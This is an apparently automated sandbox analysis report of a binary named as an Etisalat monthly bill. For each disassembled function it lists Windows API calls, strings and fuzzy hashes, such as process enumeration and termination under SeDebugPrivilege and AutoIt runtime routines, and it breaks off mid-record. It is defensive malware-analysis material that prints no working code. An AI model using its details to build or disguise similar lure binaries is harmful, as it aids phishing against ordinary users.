Instruction ID: 95c2168df02635c52a5ec963bdf05e5156591fce9c72ad6bd4b2dd6a4ea13a29
Opcode Fuzzy Hash: 3df87dde6f8c6dce8e06f72b4af7cfe4d34a5bed743d98efde5ad4dfbb1e938e
Instruction Fuzzy Hash: BC01BBB5254708BFE710ABA5DC4DF6B3BACEB89B11F008411FA05EB1A1CA70D810EF20

Function 0092A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0090D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0090D501
Part of subcall function 0090D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0090D50F
Part of subcall function 0090D4DC: CloseHandle.KERNEL32(00000000), ref: 0090D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092A16D
GetLastError.KERNEL32 ref: 0092A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0092A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0092A268
GetLastError.KERNEL32(00000000), ref: 0092A273
CloseHandle.KERNEL32(00000000), ref: 0092A2C4

Strings

SeDebugPrivilege, xrefs: 0092A18F

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b2968c2bdbace688269c007cbabba9c89b2bfdb34b09db875ad2b96a52a08953
Instruction ID: cfd0dbcc8f1eeaf3c5f2cfbfd255bd750e388a28ccb9136f73a477094d49aff4
Opcode Fuzzy Hash: b2968c2bdbace688269c007cbabba9c89b2bfdb34b09db875ad2b96a52a08953
Instruction Fuzzy Hash: B861C071208652DFE720DF18D894F15BBE5AF44318F18848CE4668BBA3C776EC45CB92

Function 00933886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00933925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0093393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00933954
_wcslen.LIBCMT ref: 00933999
SendMessageW.USER32(?,00001057,00000000,?), ref: 009339C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 009339F4

Strings

SysListView32, xrefs: 009338F7

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: a77b4141012b7c15ae50b689aac205bc3fd1ea225528a11d908b300d097a8f70
Instruction ID: 152071b96905b0210508ac8b4f365c4afca894eaec01971f51ee3d041a7ce62d
Opcode Fuzzy Hash: a77b4141012b7c15ae50b689aac205bc3fd1ea225528a11d908b300d097a8f70
Instruction Fuzzy Hash: 4F41A171A40219EBEB219F64CC49FEA7BA9FF48354F104526F958E7281D771DA80CF90

Function 0090BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0090BCFD
IsMenu.USER32(00000000), ref: 0090BD1D
CreatePopupMenu.USER32 ref: 0090BD53
GetMenuItemCount.USER32(01255A58), ref: 0090BDA4
InsertMenuItemW.USER32(01255A58,?,00000001,00000030), ref: 0090BDCC

Strings

0, xrefs: 0090BCA8
2, xrefs: 0090BD37

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: cced61385f67aee38e95d0c9df975553ac32e16a522bc56e8d09ac43bf04b424
Instruction ID: 7af3d0200967ad5a629b0010401900a517df05316cf174f4f4b084e45773dbdb
Opcode Fuzzy Hash: cced61385f67aee38e95d0c9df975553ac32e16a522bc56e8d09ac43bf04b424
Instruction Fuzzy Hash: 2E519CB0A04206DFDB10DFA8D888BAEFBF8EF85314F148619E551A72D1D7709940CB61

Function 0090C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0090C913

Strings

stop, xrefs: 0090C8E4
question, xrefs: 0090C8CC
blank, xrefs: 0090C895
info, xrefs: 0090C8B4
warning, xrefs: 0090C8FC

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 37fd62409c2bbba4e5aa6366a1c3a1b266c6d0157ce794fa18ef947aafb92649
Instruction ID: 28562c11ecea2c43f6e64c041c61a6732fa299f1260a341b26053e9b2859b460
Opcode Fuzzy Hash: 37fd62409c2bbba4e5aa6366a1c3a1b266c6d0157ce794fa18ef947aafb92649
Instruction Fuzzy Hash: 56115C72689307BEE7049B14DC83DAE37ACDF15318F20412FF904E62C2E7B49E406269

Function 0090ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0090ED2A
_wcslen.LIBCMT ref: 0090ED3B
_wcslen.LIBCMT ref: 0090ED79
_wcslen.LIBCMT ref: 0090EDAF
_wcslen.LIBCMT ref: 0090EDDF
_wcslen.LIBCMT ref: 0090EDEF
_wcslen.LIBCMT ref: 0090EE2B
_wcslen.LIBCMT ref: 0090EE5A

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 7410d8b3e635ac3ca9b17e5f90040e2c9764aad9a9c656c9e2d4dc044e500c98
Instruction ID: 3210cf231ecb3aef273b51285ddba3ee75adfa2bb33621dd0c8577dca3e9b4a1
Opcode Fuzzy Hash: 7410d8b3e635ac3ca9b17e5f90040e2c9764aad9a9c656c9e2d4dc044e500c98
Instruction Fuzzy Hash: 23418365C1021865CB11EBB8C88AEDFB7B8FF45710F504866E518E3161FB34E255C7A6

Function 008BF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,008F682C,00000004,00000000,00000000), ref: 008BF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,008F682C,00000004,00000000,00000000), ref: 008FF3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,008F682C,00000004,00000000,00000000), ref: 008FF454

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 98e907d1a26eb5209f266f44beeaf4ab370891c70501a823585f337ab4040918
Instruction ID: 3ce1408066632a82c067e61758e9c808c2ceec917931dd2ac6f0d1da4dad232b
Opcode Fuzzy Hash: 98e907d1a26eb5209f266f44beeaf4ab370891c70501a823585f337ab4040918
Instruction Fuzzy Hash: 9141B331618684BAC7398B398C887BA7F91FF56318F14453CE787E6763D631A880DB11

Function 00932D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00932D1B
GetDC.USER32(00000000), ref: 00932D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00932D2E
ReleaseDC.USER32(00000000,00000000), ref: 00932D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00932D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00932D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00935A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00932DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00932DE1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: d3c5a7a9d295abd1c8b01a5693964429b882e72e20149fc4e7cec2adaa3b280f
Instruction ID: e8014e0d47745596c92f71d681c9ad9331406f44dc0f64d79c12f4ed08a2881f
Opcode Fuzzy Hash: d3c5a7a9d295abd1c8b01a5693964429b882e72e20149fc4e7cec2adaa3b280f
Instruction Fuzzy Hash: 6D317CB2215614BFEB218F50CC8AFEB3BADEF09715F044055FE08AA2A1C6759C50CBA4

Function 00905622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00905637
_memcmp.LIBVCRUNTIME ref: 00905659
_memcmp.LIBVCRUNTIME ref: 00905671
_memcmp.LIBVCRUNTIME ref: 00905684
_memcmp.LIBVCRUNTIME ref: 0090569E
_memcmp.LIBVCRUNTIME ref: 009056B1
_memcmp.LIBVCRUNTIME ref: 009056C9
_memcmp.LIBVCRUNTIME ref: 009056E4

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 186c9695db2eb6d5d96f928974b2507a199114c038ac81a4f27d99eca1079bb1
Instruction ID: 3ded15ce165a65b2dcf2e1013b926bf659a8f0f5874dbe6ae55c5673b24f4ac2
Opcode Fuzzy Hash: 186c9695db2eb6d5d96f928974b2507a199114c038ac81a4f27d99eca1079bb1
Instruction Fuzzy Hash: 5521A761A80A09BFDB1455258E96FBB336CFF62388F450024FD05DA6C2F736ED108DA6

Function 00924FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0092502E, 00925383
Not an Object type, xrefs: 00925007

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 927a902fc5bca67e757f83d70b7e80f3321a156dfada673d7b8b593a12b0217d
Instruction ID: 6bb72e46b02e174fab1026725d02bfedb82d2644dbad5e00decbf71a567edbe4
Opcode Fuzzy Hash: 927a902fc5bca67e757f83d70b7e80f3321a156dfada673d7b8b593a12b0217d
Instruction Fuzzy Hash: 4BD1B171A0062ADFDF10CFA8D880BAEB7B9BF48344F158469E915EB285E770DD41CB90

Function 008E1522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,008E17FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 008E15CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008E1651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,008E17FB,?,008E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008E16E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008E16FB

Part of subcall function 008D3820: RtlAllocateHeap.NTDLL(00000000,?,00971444,?,008BFDF5,?,?,008AA976,00000010,00971440,008A13FC,?,008A13C6,?,008A1129), ref: 008D3852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,008E17FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008E1777
__freea.LIBCMT ref: 008E17A2
__freea.LIBCMT ref: 008E17AE

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: c912adf60400ee8ef606b00f4897c422c662e26f5d36949761fa7efd0ef53db1
Instruction ID: a023bd6f37299f6e0b5ca3625fd01f065e6de046b97c3de154fa3a9e7666b03d
Opcode Fuzzy Hash: c912adf60400ee8ef606b00f4897c422c662e26f5d36949761fa7efd0ef53db1
Instruction Fuzzy Hash: 3B91C371E0429AAADF208EB6CC89EEE7BB5FF4A714F184659E811E7151DB35CC40CB60

Function 00924523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00924648
VariantInit.OLEAUT32(?), ref: 00924749
VariantClear.OLEAUT32(?), ref: 00924753
VariantClear.OLEAUT32(?), ref: 009247B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0092472C
Null Object assignment in FOR..IN loop, xrefs: 009245D8, 00924706, 009247BE

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: c4a095541131973bbb919d7841aad78be6e467f2323f2ad9a954d53ab40a2b08
Instruction ID: 2d71b09e1a2397050c6f0200d459880bdd80822e9f841b9fa8afd07b7f694355
Opcode Fuzzy Hash: c4a095541131973bbb919d7841aad78be6e467f2323f2ad9a954d53ab40a2b08
Instruction Fuzzy Hash: B7917F71A00229ABDF20CFA4EC44FAEBBBCEF46714F108559F515AB284D7749945CFA0

Function 00911187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0091125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00911284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 009112A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009112D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0091135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 009113C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00911430

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: e7d8bf55b9e64d97f5c30c947164c7d34bf8418bd840f0d17b1e9b74a592a4d8
Instruction ID: 7059733b48bdaed8d9bd93577a50f454dda315befd06c6c297111d493443edb6
Opcode Fuzzy Hash: e7d8bf55b9e64d97f5c30c947164c7d34bf8418bd840f0d17b1e9b74a592a4d8
Instruction Fuzzy Hash: 8191DF71A0021DAFDB00DFA8D884BFEB7B9FF45710F144429EA11EB2A1D774A981CB91

Function 008B948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 7bef0d1ca147783f845a64ddf54d1194ce348697fbe1ced96f5bb7085e70ddcd
Instruction ID: 0b97c8c59838dc6609814978455405c5641fd9fd44b3851cfe9b7b67aa3d4fe1
Opcode Fuzzy Hash: 7bef0d1ca147783f845a64ddf54d1194ce348697fbe1ced96f5bb7085e70ddcd
Instruction Fuzzy Hash: BF91137194421AAFCB14CFA9C884AEEBBB8FF49320F148059E655F7351D274AA42CB60

Function 00923947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0092396B
CharUpperBuffW.USER32(?,?), ref: 00923A7A
_wcslen.LIBCMT ref: 00923A8A
VariantClear.OLEAUT32(?), ref: 00923C1F

Part of subcall function 00910CDF: VariantInit.OLEAUT32(00000000), ref: 00910D1F
Part of subcall function 00910CDF: VariantCopy.OLEAUT32(?,?), ref: 00910D28
Part of subcall function 00910CDF: VariantClear.OLEAUT32(?), ref: 00910D34

Strings

AUTOIT.ERROR, xrefs: 00923A80, 00923A85
Incorrect Parameter format, xrefs: 009239A6, 00923BA1

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 0ebf42249298d98d661d40ad57f57ca708ea2fe0bc7fab435ae997a296ae8c92
Instruction ID: 8db5d51c964854b5f212dca21168f8b0c52cf1496eb34dabd0c2a6d2ee31b922
Opcode Fuzzy Hash: 0ebf42249298d98d661d40ad57f57ca708ea2fe0bc7fab435ae997a296ae8c92
Instruction Fuzzy Hash: B59169746083159FC704EF28D48096AB7E9FF89314F14882DF88A97351DB35EE45CB92

Function 00924BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0090000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?,?,?,0090035E), ref: 0090002B
Part of subcall function 0090000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?,?), ref: 00900046
Part of subcall function 0090000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?,?), ref: 00900054
Part of subcall function 0090000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,008FFF41,80070057,?), ref: 00900064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00924C51
_wcslen.LIBCMT ref: 00924D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00924DCF
CoTaskMemFree.OLE32(?), ref: 00924DDA

Strings

NULL Pointer assignment, xrefs: 00924E23, 00924E52

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000000.00000002.2023992610.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.000000000093C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024091273.0000000000962000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024155820.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2024176129.0000000000974000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_8a0000_Etisalat Summary Bill for the Month of August.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 8b09ebfc93b70a18646bc35b32bef1ab7fb13be798d9a08f05a2886126093464
Instruction ID: 4a552ff3b52c61e04671f4144750f4cbad31a45f60dbb2c4fd39ae1e8e543287
Opcode Fuzzy Hash: 8b09ebfc93b70a18646bc35b32bef1ab7fb13be798d9a08f05a2886126093464
Instruction Fuzzy Hash: F3912771D0022D9FEF14DFA4D891AEEBBB8FF48300F108569E915A7295DB349A44CFA1

Function 009320FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00932183
GetMenuItemCount.USER32(00000000), ref: 009321B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 009321DD
_wcslen.LIBCMT ref: 00932213
GetMenuItemID.USER32(?,?), ref: 0093224D
GetSubMenu.USER32(?,?), ref: 0093225B

Part of subcall function 00903A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00903A57
Part of subcall function 00903A3D: GetCurrentThreadId.KERNEL32 ref: 00903A5E
Part of subcall function 00903A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009025B3), ref: 00903A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 009322E3

Part of subcall function 0090E97B: Sleep.KERNEL32 ref: 0090E9F3

Memory Dump Source

Source File: 00000000.00000002.2024011930.00000000008A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008A0000, based on PE: true

